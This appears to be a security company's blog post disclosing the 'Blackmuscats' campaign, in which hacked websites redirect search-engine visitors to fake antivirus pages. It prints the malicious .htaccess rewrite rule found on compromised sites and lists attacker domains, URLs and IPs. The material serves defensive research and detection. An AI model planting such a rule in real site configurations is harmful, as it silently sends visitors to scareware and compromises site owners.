Blackmuscats Conditional Redirections to Fake AntiVirus

We are seeing many sites today compromised with the Blackmuscats conditional redirection. This malware causes anyone visiting the hacked site to be redirected to a Fake AV (AntiVirus). Why Blackmuscats? All the compromised sites have .htaccess redirections pointing to files ending in “blackmuscats?5″.

So far we have detected more than 8,000 sites with this type of redirection and the number is growing (last night we had only found a few hundred).

Note: this is a conditional redirection, so you are only sent to the malware site if you are coming from a search engine, not if you visit the site directly.

Here are some of the domains being used as part of this malware campaign:

1297 redirections http://my-supas.ru/blackmuscats?5
1156 redirections http://moisupas.ru/blackmuscats?5
1077 redirections http://moi-supas.ru/blackmuscats?5
1001 redirections http://mysupas.ru/blackmuscats?5
975 redirections http://moi-supa.ru/blackmuscats?5
391 redirections http://my-supa.ru/blackmuscats?5
329 redirections http://supa-web.ru/blackmuscats?5
263 redirections http://my-supas.ru/blackmuscats?5
244 redirections http://moisupas.ru/blackmuscats?5
223 redirections http://moi-supas.ru/blackmuscats?5
206 redirections http://mysupas.ru/blackmuscats?5
192 redirections http://moi-supa.ru/blackmuscats?5
80 redirections http://my-supa.ru/blackmuscats?5
65 redirections http://supa-web.ru/blackmuscats?5
.. many more..

This is what the .htaccess looks like on the hacked sites:

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|..suchmaschine|web-archiv|infospace)\.(.*)
RewriteRule ^(.*)$ http://moisupas.ru/blackmuscats?5 [R=301,L]

What happens next?

So what happens next? If someone visits a compromised sites by clicking on a search engine results page, they will be sent to one of those domains we listed above, and then to www1.antivirusworrydanger.pl (and similar AV related domains):

http://nashi-fitnes.ru/azebrise/niklas.php (212.71.10.196) -> redirection to ->
http://www1.antivirusworrydanger.pl/370l3591/al/1fedfba29dd0193d/pr2/0/ (37.221.161.3)

This is where you get those scary warnings like “Your computer is compromised”.

We will post more details as we keep monitoring it.

Scan your website for free:
About Daniel Cid

Daniel B. Cid is the Founder & CTO of Sucuri and also the founder of the open source OSSEC HIDS. His interests range from intrusion detection, log analysis (log-based intrusion detection), web-based malware research and secure development.

You can find more about Daniel at his site dcid.me or on Twitter: @danielcid